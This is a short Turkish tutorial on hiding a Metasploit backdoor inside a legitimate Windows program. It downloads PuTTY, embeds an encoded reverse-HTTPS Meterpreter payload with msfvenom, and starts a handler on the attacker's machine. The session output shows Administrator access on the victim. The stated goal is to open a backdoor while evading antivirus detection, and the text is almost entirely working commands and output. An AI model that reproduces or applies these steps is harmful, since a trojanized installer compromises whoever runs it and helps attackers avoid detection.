Çalıştırılabilir Windows Dosyası içerisine Zararlı Kod Enjeksiyonu

Bu notta basit olarak çalıştırılabilir bir Windows dosyasına Metasploit ile üretilmiş zararlı kodun nasıl enjekte edildiğinden bahsedilecektir. Burada amaç normal bir exe dosyası kullanarak sisteme arka kapı oluşturmak ve antivirüs yazılımlarının tespitinden kaçınmaktır. Metasploit msfvenom aracı ile Putty binary dosyasına zararlı kod enjekte edilebilir.

Öncelikle exe dosyası temin edilir.

# wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Akabinde encode edilmiş payload bu dosya içerisine enjekte edilir. Burada Reverse HTTPS Meterpreter payload'u kullanılmış ve 10 iterasyon ile x86/shikata_ga_nai encoder'ı kullanılmıştır.

# msfvenom -p windows/meterpreter/reverse_https -f exe -e x86/shikata_ga_nai -i 10 -k -x /tmp/putty.exe LHOST=192.168.4.101 LPORT=443 > xputty.exe

-x seçeneği ile şablon exe olarak daha önceden indirilen putty belirtilmiş ve zararlı kod içerisine gömülmüştür.
-k seçeneği ile zararlı kod hedef makinede yeni bir thread olarak çalışabilmekte ve orijinal Putty fonksiyonları aynen korunmaktadır.

Saldırgan makine üzerinde handler başlatılarak kurban üzerinde zararlı exe'nin çalışıtırılması beklenir.

(msf)> use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set lport 443
LPORT => 443
msf exploit(handler) > set lhost 192.168.4.101
LHOST => 192.168.4.101
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://192.168.4.101:443/
[*] Starting the payload handler...

Kurban tarafında exe çalıştırıldığında her ne kadar fonksiyonellik olarak fark gözükmese de arka planda saldırgan makineye bağlantı kurulmakta ve sistem ele geçirilmektedir.

[*] Meterpreter session 1 opened (192.168.4.101:443 -> 192.168.1.11:2710) at 2013-07-01 13:01:00 +0100
meterpreter > pwd
C:\
meterpreter > getuid
Server username: AG\Administrator